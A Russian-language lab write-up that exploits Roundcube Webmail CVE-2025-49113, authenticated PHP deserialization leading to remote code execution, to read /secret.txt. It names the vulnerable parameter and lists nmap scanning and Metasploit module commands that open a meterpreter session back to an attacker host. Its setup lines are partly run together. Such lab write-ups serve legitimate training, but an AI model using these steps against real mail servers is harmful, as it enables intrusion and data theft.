Практическая лаборатория эксплуатации для Roundcube Webmail CVE-2025-49113 (аутентифицированная десериализация PHP-объектов → RCE) для чтения /secret.txt.
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Только для образовательных целей
Этот репозиторий документирует мою пошаговую эксплуатацию Roundcube Webmail CVE-2025-49113 в контролируемой лабораторной среде для получения секрета, хранящегося в /secret.txt.
⚠️ Отказ от ответственности
Все работы проводились в лабораторной/учебной среде, на тестирование которой у меня есть разрешение.
Не используйте эти методы против систем, которые вам не принадлежат или которыми вы не управляете.
Roundcube Webmail — это веб-браузерный открытый PHP-клиент электронной почты, который подключается к почтовым ящикам через IMAP и отправляет письма через SMTP. Обычно он работает на Apache или Nginx с MySQL/PostgreSQL/SQLite и широко используется в средах общего хостинга.
Уязвимость – CVE-2025-49113
Все версии Roundcube вплоть до 1.6.10 (а также 1.5.x до 1.5.10) содержат критическую ошибку в program/actions/settings/upload.php. Параметр _from не проходит надлежащей проверки, что позволяет аутентифицированному злоумышленнику вызвать небезопасную десериализацию объектов PHP и добиться удаленного выполнения кода с привилегиями веб-сервера.
Учетные данные лаборатории:
roundcubercpassЦель:
Какой секрет хранится в файле
/secret.txt?
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113Команда: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt